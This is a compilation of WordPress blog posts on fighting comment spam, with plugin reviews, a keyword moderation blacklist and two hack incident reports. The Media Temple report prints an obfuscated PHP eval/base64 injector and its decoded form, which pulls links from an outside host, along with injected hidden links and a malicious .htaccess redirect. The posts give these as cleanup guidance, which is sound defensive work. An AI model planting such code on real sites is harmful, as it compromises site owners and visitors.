Know thy comments

In WordPress, there are three types of responses: comments, pingbacks, and trackbacks. The status of any given response is either:

• approved – appearing on your site
• spammed – flagged as spam
• moderated – on hold for review
• in the trash – marked for deletion

Theoretically, you’re going to know about approved comments that appear on your site. Likewise, you’ll have a chance to review any moderated comments, and nothing makes it to the trash by accident, so you know about those as well. What you don’t always know about are spam comments flagged as such by a plugin. Some of these are going to be ham, and they can be tricky to spot, especially as the number of spam comments begins to climb.

Out of the box

Out of the box, WordPress doesn’t flag any response as spam, unless you add some phrases to the built-in comment blacklist. Then, any comments matching any phrases in your blacklist are sent to the spam pile. So the key to preventing blacklist ham (mmmm..) is being absolutely sure that you want nothing to do with any comments mentioning “baby uggs” or who knows what.

Akismet & ham stats

It’s easy to stop spam without plugins, but activate Akismet and suddenly you’ve got greater accuracy, better automation, and some incredible-looking statistics. Here are Akismet stats for false positives during the last few months here at DigWP.com:

That’s good news, but don’t be fooled – the number of false positives also depends on you, the user. Seeing few false positives is good news if you’re actively looking for them, otherwise who knows how many ham comments have slipped through. We check for false positives fairly regularly, so the low numbers are great, as is the decreasing number of spam comments:

This is also a good sign, but it’s still smart to keep an eye on things and rescue as much ham as possible. Back in the day, I really got into analyzing teh spam – digging through the spam bin, looking for patterns, checking sources, and rescuing ham comments from the abyss. It’s fun if you have the time, but these days it’s better to just get it done..

Ham-rescue tips

Now that we’ve seen how it works, here are some clues for cleaving through large slabs of spam quickly and effectively..

• Comment text – legit comments tend to look real and stand out among the junk
• Gravatars – usually a good signal of quality, but spammers can haz gravatars too
• Link text – stupid link text is a huge giveaway, like “Baby Ugg Boots” or whatever
• Site URL – anything more than a domain or first-level subdirectory is probably spam
• Excessive links – legitimate comments rarely contain more than one or two links

Here’s a screenshot illustrating some of these aspects of spam. Of course, there are plenty more examples waiting for you in Ye Olde Spam Bin!

Gravatars really stand out, but aren’t always the ham you’re looking for

Those are the big giveaways, but it’s generally easier/quicker to scan for ham than spam. That is, rather than looking for evidence of spam, scan for signs of legitimacy and quality. So a good example would be scanning for gravatars – you’re not trying to find the grey mystery man icon, you’re looking for something original, like the flag icon in the previous screenshot. With some repetition, the visual clues sort of gel together and the ham just sort of jumps out at you as sift through the pile.

Wrapping it up..

So what did we learn? Spam is the bad stuff, ham is the good stuff. WordPress doesn’t flag anything as spam by itself unless you add phrases to the comment blacklist. Add a great anti-spam plugin such as Akismet to the mix, and you’ve made your life easier by automating the process. But if you care about your readers and their feedback, you should periodically scan through your spam comments and rescue any false positives. With some repetition, checking your spam and saving ham comments takes only a few minutes, improves the quality of your site, and keeps commentators happy and ready for more.

© 2011 Digging into WordPress | Permalink | 5 comments | Add to del.icio.us | Post tags: comments, spam, tips, tricks

Akismet

The best anti-spam plugin for WordPress. Bundled with WordPress, Akismet requires a registration key, but is easy to setup and provides excellent “set-it-and-forget-it” spam protection for WordPress.

bcSpamBlock

JavaScript-based anti-spam plugin that uses JavaScript to filter out spam quietly and discretely. Users without JavaScript must prove their legitimacy via copy-&-paste CAPTCHA exercise.

Comment Spam Stopper

Blue Anvil’s anti-spam plugin is CAPTCHA-based and includes JavaScript validation to ensure that required fields in the comment form have been populated with data. To save time, the CAPTCHA field is not displayed when logged into Admin.

Comment Spam Trap

Delivers a double death blow by adding a hidden spam field and an identical but required CAPTCHA field. This simple logic tricks mortal spam bots into revealing themselves and getting blocked. Also blocks trackback spam and optionally sends email notifications of anything it blocks.

Cookies for Comments

Takes a different approach by adding a randomly generated stylesheet URL to your theme. When that URL is requested by the browser, a cookie is set that is required for the visitor/user to leave a comment. The plugin homepage is kinda thin, so scan the WordPress Forum to gain more insight about this remarkable plugin.

Did You Pass Math?

Requires the user to solve a simple math problem, like “what’s 1+2?” If they can’t do it, they’re considered a bot and the comment is blocked. Simple yet effective anti-spam plugin with nothing to configure – just set and forget.

JSSpamBlock

Uses JavaScript to filter out spam bots and their filthy comments. Legitimate users prove their identity by entering a given number. Provides fallback for non-JavaScript visitors.

Peter’s Custom Anti-Spam

A full-featured CAPTCHA-based anti-spam plugin for WordPress. Requires all commentators to identify a random word before comment submission. Words are displayed as images and are completely customizable. Features: random font display, no cookies required, no JavaScript required, auto-generated audio for visually impaired users, selective blocking of trackbacks and pingbacks, and much more. First choice for full-flavored CAPTCHA plugin.

reCAPTCHA Plugin

Displays words from old books that users must correctly interpret. Uses the popular reCAPTCHA service that is used on popular sites such as Twitter, Facebook, and StumbleUpon. Upside: use of this service helps to digitize old books. Downside: requires a key to work.

Referrer Bouncer

Referrer Bouncer provides powerful protection against referrer spam. Easy to use and requires no configuration. As it says, “It is like the strong silent bouncer at your favorite club.” The instant cure for the referrer spam that ails you.

Simple Trackback Validation

Solid protection against trackback spam. Trackback validation is done with an IP/referrer check and by checking the trackback page for your URL. Bottom line: an excellent solution for stopping trackback spam. Includes Settings Page for easy configuration, including the option to delete or spam blocked trackbacks.

Spam Free

Spam Free is an “extremely powerful anti-spam plugin for WordPress that eliminates comment spam, including trackback and pingback spam.” Spam Free has many features, including no CAPTCHA required for site visitors, a spam-free contact form, and dashboard counter with blocked spam count.

Word Verify

CAPTCHA-based anti-spam plugin that requires the user to enter a simple word in plain text (rather than an image). This makes it much easier for users to get it right the first time, while filtering out lots of automated spam. This plugin is probably best for smaller sites and blogs, as they aren’t generally targeted by the heavier OCR-capable spambots. Or so the thinking goes. Includes Settings Page for basic configuration.

WP-HashCash

CAPTCHA-based anti-spam plugin that claims to be 100% effective at blocking all spam and no real comments. Also blocks most pingback & trackback spam. Features Settings Page for statistics and configuration. And a huge bonus, WP-HashCash is “100% standards compliant XHTML 1.1 and works with both jQuery and Prototype.”

Note that the book now contains an abbreviated version of this list, along with sidebar mentions of some of the other plugins sprinkled throughout the various chapters. Going through this list again for the post, it was great seeing the wide variety of sites and personalities involved in keeping WordPress spam-free. If you know of any good anti-spam plugins that we missed, feel free to share them in the comments.

© 2011 Digging into WordPress | Permalink | 20 comments | Add to del.icio.us | Post tags: comments, spam

(Caution: the blacklist contains several instances of profanity in order to keep vile language out of your comments.)

Custom WordPress Comment Moderation Blacklist

The idea is simple: copy and paste this custom blacklist into the Comment Moderation field in your WordPress Admin area, which will look something like this:

The ‘Comment Moderation’ field in the WordPress ‘Discussion Settings’ Area

Here is the list, in all of its offensive pharmaceutical, gambling, sex-industry glory (see notes afterward for more information on usage and functionality):

д
и
ж
Ч
Б
. ,
? ,
[url=
[/url]
thx
sex
byob
nude
loan
debt
poze
bdsm
soma
visa
hotel
paxil
anime
naked
poker
coolhu
cialis
incest
casino
dating
payday
rental
ambien
holdem
cialis
adipex
booker
youtube
myspace
advicer
flowers
finance
freenet
-online
shemale
meridia
cumshot
trading
adderall
gambling
roulette
top-site
mortgage
pharmacy
dutyfree
ownsthis
duty-free
insurance
ringtones
insurance
blackjack
hair-loss
bllogspot
baccarrat
thorcarlson
jrcreations
credit card
macinstruct
hydrocodone
leading-site
slot-machine
carisoprodol
ottawavalleyag
cyclobenzaprine
discreetordering
aceteminophen
augmentation
enhancement
phentermine
doxycycline
citalopram
cephalaxin
vicoprofen
lorazepam
oxycontin
oxycodone
percocet
propecia
tramadol
propecia
percocet
cymbalta
lunestra
fioricet
lesbian
lexapro
valtrex
titties
xenical
meridia
levitra
vicodin
ephedra
lipitor
breast
cyclen
viagra
valium
hqtube
ultram
clomid
cyclen
vioxx
zolus
pussy
porno
xanax
bitch
penis
pills
male
porn
dick
cock
tits
fuck
shit
gay
ass
gdf
gds

As mentioned, to use this list, just copy/paste into your Comment Moderation field and you’re done. Along the way, you may find that additional terms are needed, or that certain terms need removed. Feel free to tweak according to the specific needs of your site. It’s all good :)

A couple of notes about this blacklist:

• The first five or so characters are effective at blocking 99% of nonsensical Russian spam.
• The period/comma entries block a recent rash of spam that included these particular strings.
• Most of the terms are highly specific to spam comments and should keep false positives at a minimum.
• Even so, it is recommended that this custom blacklist be used as a “Comment Moderation” list and not as a “Comment Blacklist” in order to retain your ability to screen for false positives.
• Additional terms are easily added by appending the list with the character string on its own line.
• It would be great to build this blacklist up a little further. If you have your own distinct collection of terms, let me know and I will add them to the list.

Any questions/comments/concerns welcome in the comments area.

© 2010 Digging into WordPress | Permalink | 14 comments | Add to del.icio.us | Post tags: blacklist, comments, Security, spam

• They aren’t 100% sure the cause, but yes, it is their fault.
• About 10% of all (gs) users were affected.
• It’s not WordPress specific, it’s PHP specific.
• Definitely change your passwords, definitely don’t change it back to the original password.

A number of people (Michael Torbert, Kyle Brady, Jeffrey Barke, Adrian Hanft) are reporting that their Media Temple sites have been hacked. Digging Into WordPress is on a Media Temple (gs) and we got this email from them late last night:

Dear Valued Customer,

This is an automated notice informing you that our system has reset your Server Administrator FTP/SSH password due to suspicious activity observed on your (gs) Grid-Service. Our systems have taken measures to protect your service from any possible future exploits.

When trying to FTP into the site this morning, the access attempt was denied (wrong password), and then blocked. I had to log into the admin, unblock the IP, and reset the password to get in. In poking around a bit, it doesn’t look like Digging Into WordPress was affected. Thank god…

Some of the facts I’m seeing around:

• The attack is not specific to WordPress, although also affects WordPress (Some folks saying their Drupal sites have been hit, or sites just using plain old PHP)
• It may be a result of passwords being stored/sent in plain text
• Media Temple is mostly quiet on the issue but has been telling folks there has been a huge upsurge in attempted FTP connections to sites.
• Some folks are blaming Media Temple, others blaming WordPress

Files to check on your own sites

index.php

<!--5edfgh345--><?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

Which evaluates to this:

$l="http://tourreviews.asia/links2/link.php"; if (extension_loaded("curl")){
$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}
else{$r=implode("",file($l));} print @$r;

Links are being inserted into the page before the </html> tag:

<!-- [6eb602d48b8b7f42aba0ce0c31ebe3f5 --><!-- 9190819521 --><noscript><ul><li><a href="http://rg8rhg34h34h.cc/c">.</a></li></ul></noscript><!-- 6eb602d48b8b7f42aba0ce0c31ebe3f5] -->

.htaccess

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4&parameter=sf [R,L]

.nfs* (unnamed file in root of server)

Fixing It

We weren’t victims of this attack so far, so please refer to the people linked above for more first-hand advice. However, changing passwords across the board, especially FTP passwords is a must. Also remove all the malicious code shown above from the files. If possible, a fresh WordPress install would probably be a good idea (backup your database and theme first!)

© 2009 Digging into WordPress | Permalink | 27 comments | Add to del.icio.us | Post tags: hacking, Links, spam

Not even Akismet..

“Sure,” you are thinking, “you don’t need any plugins except for Akismet.” I mean, you definitely need that plugin, right? After all, it’s included with WordPress, so it’s got to be important. Umm, not so much. Yes, there are certain blogs that would probably be wise to take advantage of the additional spam-protection that Akismet might provide, but for 99% of the sites out there, it really isn’t necessary.

WordPress is strong enough..

I think one of the most underrated strengths of WordPress is its built-in anti-spam functionality. With an ounce of knowledge and a pound of forethought, you can configure your WordPress Discussion settings to act as a powerful and effective defense against the evil forces of spam. No plugins required! Let’s look at WordPress’ anti-spam tools and see why they’re all you need for a spam-free site..

Default article settings

First up, consider your default article settings. If comments aren’t enabled, of course you know that you don’t need Akismet or any other anti-spam plugin for that matter. If comments are enabled, you can cut out a significant portion of spam by simply disallowing pingbacks and trackbacks. By clicking a single checkbox, all of that crap that comes rolling in as trackback spam will stop. That’s a huge step right there, and it will eliminate every plugin that has anything to do with displaying or controlling ping/trackbacks.

Comment author must fill out name and e-mail

Another smart move, although I think most sites do this one already. By requiring your commentators to at least fill out these two fields (even if it is just dummy data most of the time), you brush off all of those lazy spammers who are picking up the easy ground fruit. Most legitimate commentators don’t mind filling in this info because they usually have something they want to say. Lazy spammers, not so much.

Users must be registered and logged in to comment

If possible given the specific goals of your site, requiring users to log in before commenting is an extremely effective way of preventing comment spam. Although requiring registration will stop a lot of legit comments as well, it is a powerful deterrent to lazy spammers and completely stops automated scripts. Sure, you may still get some trolls stinking up the place, but you would be getting those anyway. Plus, if they’re registered, it makes it easier to deal with them.

Automatically close comments on articles older than XX days

This is my favorite WordPress anti-spam feature. For a long time, we needed a plugin to get this done, but now that it is built into WordPress, everyone should be using it. Here at Digging into WordPress, we close comments on old posts after 90 days, which seems to be just about the right amount of time. Anything longer than that, and your posts begin to get targeted by spammers and automated spam scripts. Especially if your posts tend to do well and build up a lot of page rank, they will be prime targets for spam as time rolls on.

Break comments into pages with XX comments per page

This one’s not as obvious, but it is also a great way to reduce the incentive to spam your site. Spammers target strong pages for their junk, so by breaking your comments into pages of, say, 20 comments each, you get the best comments on the first page (the same page as the article), and then the typically declining-quality comments on subsequent non-ranking pages. Just make sure you are using meta canonical tags to keep the juice where it should be.

E-mail me whenever..

Unless your site is literally flooded with comments on every post, getting email alerts for new comments is an excellent way to kill any spam nonsense that gets through. I have done this at Perishable Press for four years now, and you would be hard-pressed to find even one spam comment anywhere on the site.

Before a comment appears an administrator must always approve the comment

This could get kind of labor-intensive, but it is a 100%-guaranteed way of completely eliminating spam without using any plugins whatsoever. Zero. Nada. Nil. If you are one of the many millions whose blog receives fairly few comments, this method will keep your comments squeaky clean.

Comment author must have a previously approved comment

A super-effective strategy that is not as labor-intensive as moderating all comments and not as restrictive as requiring registration. The idea here is that you get a chance to “meet” each one of your commentators and leave the door open only for the good guys. This technique drastically cuts back on human spam, and virtually eliminates automated spam (unless you don’t catch it the first time).

Hold a comment in the queue if it contains XX or more links

Lots of comment spam is just crawling with links. A few mindless words and then BAM — they drop in a few hundred links. Some of the more subtle spammers are less obvious, but still have to unload their payload somehow, so they usually integrate a couple of links within some not-so-carefully crafted text. You know what I’m talking about. You definitely want to moderate anything with more than like two or three links. This trick is great for catching some of the craftier spam maggots.

Comment Moderation Blacklist and Spam Blacklist

A finely tuned WordPress Blacklist list eliminates the need for many types of plugins, scripts, and third-party blacklists. Any words, characters, or IP addresses included in either the Moderation or Spam Blacklist will be used to innoculate your site against any matching comments. Granted, it takes a bit of persistence to build up a good list, but once you do, it is very difficult for spammers to get around it. Note that, unless you are absolutely sure, you should probably stick with the Moderation Blacklist (regular expressions are powerful things!).

All of these great anti-spam features are like having fifty plugins already built-in to WordPress. With them, you can configure a powerful anti-spam strategy for just about any type of site without any plugins — not even Akismet.

Why not just use a bunch of plugins instead?

Because you don’t have to. Plugins require maintenance, frequent updating, etc. Every upgrade of WordPress and/or your plugins opens the door to possible issues and conflicts. Further, plugins consume valuable server resources, affecting the performance and consistency of your site. In general, the fewer plugins you have, the easier and more efficient things are going to be. I guess my feeling is, try to take the “zen” approach as much as possible — if something isn’t absolutely necessary, don’t bother with it. More and more, I am realizing that anti-spam plugins simply aren’t needed to run an effective and spam-free site.

© 2009 Digging into WordPress | Permalink | 48 comments | Add to del.icio.us | Post tags: comments, spam

The mobile version of my site was built by Mobify, so I contacted them right away. As I should of known, of course Mobify can’t insert content into a site, they only are a presentation layer on top of the already existing content. They were very quick and helpful with their response and sent me some useful links to what the problem might be.

This of course meant that the site itself was hacked. Time is of the essence at this point, because not only do I not want my visitors seeing nasty spam, I don’t want Google bot to cruise through and see the mess and hurt my SEO. I immediately set out to figure out where these spam links were being inserted from.

I had this happen to me years ago and it turned out the theme files themselves were altered and spam injected that way. I took a look through all of them quickly and didn’t see anything. I could see from the source on the site that the links were being inserted after the content on each post. I could also see at this point that the links were identical on each post. This seemed like a theme file injection to me, but clearly it wasn’t.

I popped open the WordPress Admin itself and checked out a post. Low and behold, there the links were, right in the content for each post. I checked out a number of them, new and old, and there were all the same. At this point, there were two possibilities. The Admin was compromised giving someone access in there and the ability to edit posts or the Database itself was compromised.

Due to the speed of the attack, the fact that all the links were the same, and that over 500 Posts/Pages were identically altered, I concluded it must have been a database attack.

Here is what I did:

1. I changed the Admin username and password. Just to make sure that the Admin itself was secure, this login and password must be changed. Since you cannot change usernames after they are created, I created a new account with a new password, logged in with that, and deleted the original account, attributing all posts to the new account.
2. I changed the server admins username and password. My site is managed by Plesk, which has a login and password to itself. If someone had access to this, they could access the Database. It is unlikely this was compromised, but to cover all the bases, this was changed as well.
3. The database name, database username, and database password was changed. Changing the database password might have been enough, but just to be as difficult as possible I changed both the username and the password. The database name was changed later after the cleanup (see below).
4. I changed the FTP login and password. If the hacker had this, they could have altered the theme files or opened the wp-config.php file to find the database credentials.
5. The XMLRPC file was removed. This file is used for pingback and trackbacks as well as remote editing possibilities like posting by email. I literally use none of these things, and this file has been responsible for security problems in the past, so I removed it.
6. The file permissions where checked. In particular, I found the wp-config.php file was set at 775, I changed it to 755. I also made sure that none of the file were world writeable except the very few that need to be, like the uploads folder.

What the spam insertion looked like

<div style=\"\\64\\69\\73\\70\\6c\\61\\79:\\6e\\6f\\6e\\65\">
<a href=\"http://www.fcit.usf.edu/li/viagra.html\">viagra</a>\r\n<a href=\"http://www.fcit.usf.edu/li/free-viagra.html\">free viagra</a>\r\n

... lots more ...

</div>

That “style” attribute (inline CSS), when rendered in a typical browser, converted to display: none; and thus were not visible. For whatever reason, when Mobify picked up this content, that weird string of characters wasn’t converted and thus the div was visible not hidden.

The reason I’m sure the hackers chose this technique is that the blog owner may never realize the links were inserted because they aren’t typically visible. I would think that Google doesn’t give any link credit to links that are in a container with display: none, but perhaps the hacker’s theory is that the google bot won’t be able to tell this div is hidden because of the weird code.

I would be interested to know if Google can be duped with this technique. It seems like they would be smart enough to detect it, yet I wouldn’t be surprised if the site is penalized anyway due to being compromised by spam.

How I Removed the Links

Luckily the code that was inserted in every single Post/Page was identical. I downloaded a fresh copy of the Database (as a .SQL file), opened it up in TextMate (any text editor with find/replace will do) and did a find/replace on the block of spammy code (replaced it with nothing). Then I saved a new copy of it and created a new database on the server (hence the change in DB name). I imported the new fixed SQL file and posted WordPress at the new database.

Crossing My Fingers

It’s been a week now, and no more problems. I pray that what I have done has fixed whatever the hole was, but of course I can’t be 100% certain because I’m not 100% certain what it was to begin with. Of course, posting all this information surely doesn’t make me any more secure but oh well. I of course have serious backups going on so the worst thing that can happen is I get hacked again and have to restore from backups and keep plugging holes.

Consequences

Although the spam wasn’t on my site for more than a few hours, someone has pointed out to me that my Google PageRank for the homepage has dropped from a reasonable and healthy PR 6 to ZERO. While PageRank is a very weird thing and it could be any number of things including a random inaccurate report from Google, it seems more likely this is a penalization from them for the spam. Many of my subpages, which get crawled far less frequently, still have their PageRank. It’s not just the PageRank, many searches that would have brought up the homepage (e.g. my own name) are now far down the SERP pages when they used to be #1. This of course will be seriously affecting my traffic until my PageRank is restored, if it ever is.

CSS-Tricks, is non-trivial portion of my income, and if there is a serious dip in traffic it could certainly affect me financially. I’m not whining, it just goes to show that site security is not some abstract nerdy hobby, it’s serious business that can have serious consequences.

© 2009 Digging into WordPress | Permalink | 29 comments | Add to del.icio.us | Post tags: database, hacking, spam